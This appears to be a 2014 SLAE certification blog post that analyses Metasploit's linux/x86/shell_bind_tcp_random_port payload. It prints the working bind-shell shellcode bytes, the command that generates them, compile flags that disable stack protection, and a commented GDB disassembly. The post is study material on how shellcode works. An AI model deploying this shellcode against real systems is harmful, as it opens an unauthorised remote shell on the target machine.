sábado, 10 de mayo de 2014

[SLAE] V-3 Analyzing Metasploit linux/x86/shell_bind_tcp_random_port payload

Source: SecurityTube


I explain every line witch need explication, I hope it's explained enough, if you don't understand something, leave me a commend and I will explain/respond to all questions.

1) We need generate our payload for post analysis
msfpayload linux/x86/shell_bind_tcp_random_port C
/*
 * linux/x86/shell_bind_tcp_random_port - 57 bytes
 * http://www.metasploit.com
 * VERBOSE=false, PrependFork=false, PrependSetresuid=false, 
 * PrependSetreuid=false, PrependSetuid=false, 
 * PrependSetresgid=false, PrependSetregid=false, 
 * PrependSetgid=false, PrependChrootBreak=false, 
 * AppendExit=false
 */
unsigned char payload[] = 
"\x31\xdb\xf7\xe3\xb0\x66\x43\x52\x53\x6a\x02\x89\xe1\xcd\x80"
"\x52\x50\x89\xe1\xb0\x66\xb3\x04\xcd\x80\xb0\x66\x43\xcd\x80"
"\x59\x93\x6a\x3f\x58\xcd\x80\x49\x79\xf8\xb0\x0b\x68\x2f\x2f"
"\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\xcd\x80";

compilation - gcc -ggdb -z execstack -fno-stack-protector shellcode.c -o shellcode
Source of .C code can be found here
For start I recommend to you check this my post about Bind shell
2) Analyzing with GDB

gdb -q ./shellcode

=> 0x0804a040 <+0>:        xor    ebx,ebx ; 0
   0x0804a042 <+2>:        mul    ebx     ; 0
   0x0804a044 <+4>:        mov    al,0x66 ; 102 == socketcall 
   0x0804a046 <+6>:        inc    ebx     ; 1   == sys_socket  -> int socket (int family, int type, int protocol);
   0x0804a047 <+7>:        push   edx     ; 0 == system default(tcp/upd) - int protocol
   0x0804a048 <+8>:        push   ebx     ; 1 == SOCK_STREAM 
   0x0804a049 <+9>:        push   0x2     ; 2 == AF_INET - int family
   0x0804a04b <+11>:       mov    ecx,esp ; save pointer to args
   0x0804a04d <+13>:       int    0x80    ; syscall
   0x0804a04f <+15>:       push   edx     ; 0
   0x0804a050 <+16>:       push   eax     ; 7
   0x0804a051 <+17>:       mov    ecx,esp ; save pointer
   0x0804a053 <+19>:       mov    al,0x66 ; 102 == socketcall
   0x0804a055 <+21>:       mov    bl,0x4  ; 4   == sys_listen
   0x0804a057 <+23>:       int    0x80    ; syscall
   0x0804a059 <+25>:       mov    al,0x66 ; 102 == socketcall
   0x0804a05b <+27>:       inc    ebx     ; 5   == sys_accept as we no pass port, it well be random check man accept for more information
   0x0804a05c <+28>:       int    0x80    ; syscall
   0x0804a05e <+30>:       pop    ecx     ; 7
   0x0804a05f <+31>:       xchg   ebx,eax ; ebx = 8, eax = 5
   0x0804a060 <+32>:       push   0x3f    ; 63
   0x0804a062 <+34>:       pop    eax     ; eax = 63 = dup2 redirrect STDIN/STDOUT/STDERR here they
                                                         do this bucle 8 times from 7 to 0
   0x0804a063 <+35>:       int    0x80       ; syscall
   0x0804a065 <+37>:       dec    ecx        ; ecx -1
   0x0804a066 <+38>:       jns    0x804a060  if ecx > 0 jump to <+32>
   0x0804a068 <+40>:       mov    al,0xb     ; 11 == execve
   0x0804a06a <+42>:       push   0x68732f2f ; hs//
   0x0804a06f <+47>:       push   0x6e69622f ; nib/ <- /bin/sh start
   0x0804a074 <+52>:       mov    ebx,esp    ; save pointer to /bin/bash
   0x0804a076 <+54>:       inc    ecx        ; 0
   0x0804a077 <+55>:       int    0x80       ; syscall
   0x0804a079 <+57>:       add    BYTE PTR [eax],al

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

SLAE-513

No hay comentarios:

Publicar un comentario